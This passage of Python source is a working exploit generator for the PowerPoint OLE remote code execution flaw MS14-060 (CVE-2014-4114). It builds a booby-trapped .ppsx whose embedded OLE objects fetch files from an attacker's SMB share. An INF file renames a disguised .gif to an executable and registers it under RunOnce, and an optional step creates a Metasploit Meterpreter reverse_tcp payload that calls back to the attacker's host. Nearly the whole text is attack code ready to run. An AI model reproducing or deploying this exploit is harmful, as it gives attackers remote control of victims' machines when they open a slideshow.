progId=""><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr><p:transition><p:zoom/></p:transition><p:timing><p:tnLst><p:par><p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"><p:childTnLst><p:seq concurrent="1" nextAc="seek"><p:cTn id="2" dur="indefinite" nodeType="mainSeq"><p:childTnLst><p:par><p:cTn id="3" fill="hold"><p:stCondLst><p:cond delay="indefinite"/><p:cond evt="onBegin" delay="0"><p:tn val="2"/></p:cond></p:stCondLst><p:childTnLst><p:par><p:cTn id="4" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="5" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="6" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id="7" fill="hold"><p:stCondLst><p:cond delay="1000"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="8" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="9" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set><p:cmd type="verb" cmd="-3"><p:cBhvr><p:cTn id="10" dur="1000" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id="11" fill="hold"><p:stCondLst><p:cond delay="2000"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="12" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="13" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="5"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set><p:cmd type="verb" cmd="3"><p:cBhvr><p:cTn id="14" dur="1000" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="5"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn><p:prevCondLst><p:cond evt="onPrev" delay="0"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:prevCondLst><p:nextCondLst><p:cond evt="onNext" delay="0"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:nextCondLst></p:seq></p:childTnLst></p:cTn></p:par></p:tnLst></p:timing></p:sld>'
return xml
# build [Content_Types].xml
def build_xml_content_types():
xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
xml = xml + '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="application/xml"/><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.presentationml.printerSettings"/><Default Extension="vml" ContentType="application/vnd.openxmlformats-officedocument.vmlDrawing"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="wmf" ContentType="image/x-wmf"/><Override PartName="/ppt/presentation.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideshow.main+xml"/><Override PartName="/ppt/slideMasters/slideMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/><Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/><Override PartName="/ppt/presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presProps+xml"/><Override PartName="/ppt/viewProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml"/><Override PartName="/ppt/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/ppt/tableStyles.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tableStyles+xml"/><Override PartName="/ppt/slideLayouts/slideLayout1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/ppt/embeddings/oleObject2.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>'
return xml
# build remotely hosted inf file
def build_inf(gif):
exe = gif.split('.')[0] + '.exe'
inf = '[Version]\n'
inf = inf + 'Signature = "$CHICAGO$"\n'
inf = inf + 'Class=61883\n'
inf = inf + 'ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}\n'
inf = inf + 'Provider=%Microsoft%\n'
inf = inf + 'DriverVer=06/21/2006,6.1.7600.16385\n'
inf = inf + '[DestinationDirs]\n'
inf = inf + 'DefaultDestDir = 1\n'
inf = inf + '[DefaultInstall]\n'
inf = inf + 'RenFiles = RxRename\n'
inf = inf + 'AddReg = RxStart\n'
inf = inf + '[RxRename]\n'
inf = inf + exe + ', ' + gif + '\n'
inf = inf + '[RxStart]\n'
inf = inf + 'HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\' + exe
return inf
# build blank pptx file with python-pptx
def build_presentation(filename):
prs = Presentation()
slide_layout = prs.slide_layouts[6] # blank slide
slide = prs.slides.add_slide(slide_layout)
prs.save(filename)
return
# build metasploit meterpreter reverse_tcp payload
def build_msfpayload(ip, port, file):
cmd = 'msfpayload windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > %s' % (ip, port, file)
run_cmd= subprocess.check_output(cmd, shell=True)
subprocess.call(run_cmd, shell=True)
print '[*] Meterpreter Reverse TCP EXE [%s] created.' % (file)
#################################################
############### Main ###############
#################################################
def main():
print
print '============================================================================='
print '| PowerPoint OLE Remote Code Execution (MS14-060 | CVE-2014-4114) |'
print '| Author: Mike Czumak (T_v3rn1x) - @SecuritySift |'
print '=============================================================================\n'
args = get_args() # get the cl args
ip = args.ip
share = "share"
ole1 = "oleObject1.bin"
ole2 = "oleObject2.bin"
vml = "vmlDrawing1.vml"
pptx = "tmp.pptx"
gif = "slide1.gif"
inf = "slides.inf"
# build meterpreter reverse tcp gif file (optional)
if args.msf:
print "[i] Building metasploit reverse_tcp executable"
build_msfpayload(args.ip, args.msf, gif)
# build the bin, inf and vml files
gif_bin = build_bin("EmbeddedStg1.txt", ip, share, gif)
inf_bin = build_bin("EmbeddedStg2.txt", ip, share, inf)
draw_vml = build_vml()
rem_inf = build_inf(gif)
write_file(inf, rem_inf)
print ("[*] INF file [%s] created " % inf)
# build the xml files
xml_rel = build_xml_rels(ole1, ole2)
xml_slide1 = build_xml_slide1()
xml_content = build_xml_content_types()
# build blank temp pptx presentation to convert to ppsx
build_presentation(pptx)
zippptx = pptx + ".zip"
os.rename(pptx, zippptx) # rename to zip for modification
# open temp pptx and a copy for modification
zin = zipfile.ZipFile(zippptx, 'r')
zippptx_copy = "copy_" + zippptx
zout = zipfile.ZipFile(zippptx_copy, "w")
# modify the pptx template with exploit
for item in zin.infolist():
if (item.filename == "ppt/slides/slide1.xml"):
zout.writestr(item, xml_slide1) # replace slide 1 contents
elif (item.filename == "ppt/slides/_rels/slide1.xml.rels"):
zout.writestr(item, xml_rel) # replace slide 1 rels
elif (item.filename == "[Content_Types].xml"):
zout.writestr(item, xml_content) # replace content_types
else:
buffer = zin.read(item.filename)
zout.writestr(item,buffer) # use existing file
zout.writestr("ppt/embeddings/" + ole1, gif_bin)
zout.writestr("ppt/embeddings/"+ole2, inf_bin)
zout.writestr("ppt/drawings/vmlDrawing1.vml", draw_vml)
zout.close()
zin.close()
# convert to ppsx
os.rename(zippptx_copy, args.filename)
os.remove(zippptx)
print ("[*] Exploit PPSX file [%s] created" % (args.filename))
print ("[i] Place INF and GIF (EXE) payload file (called %s) in an SMB share called 'share'" % (gif))
print
if __name__ == '__main__':
main()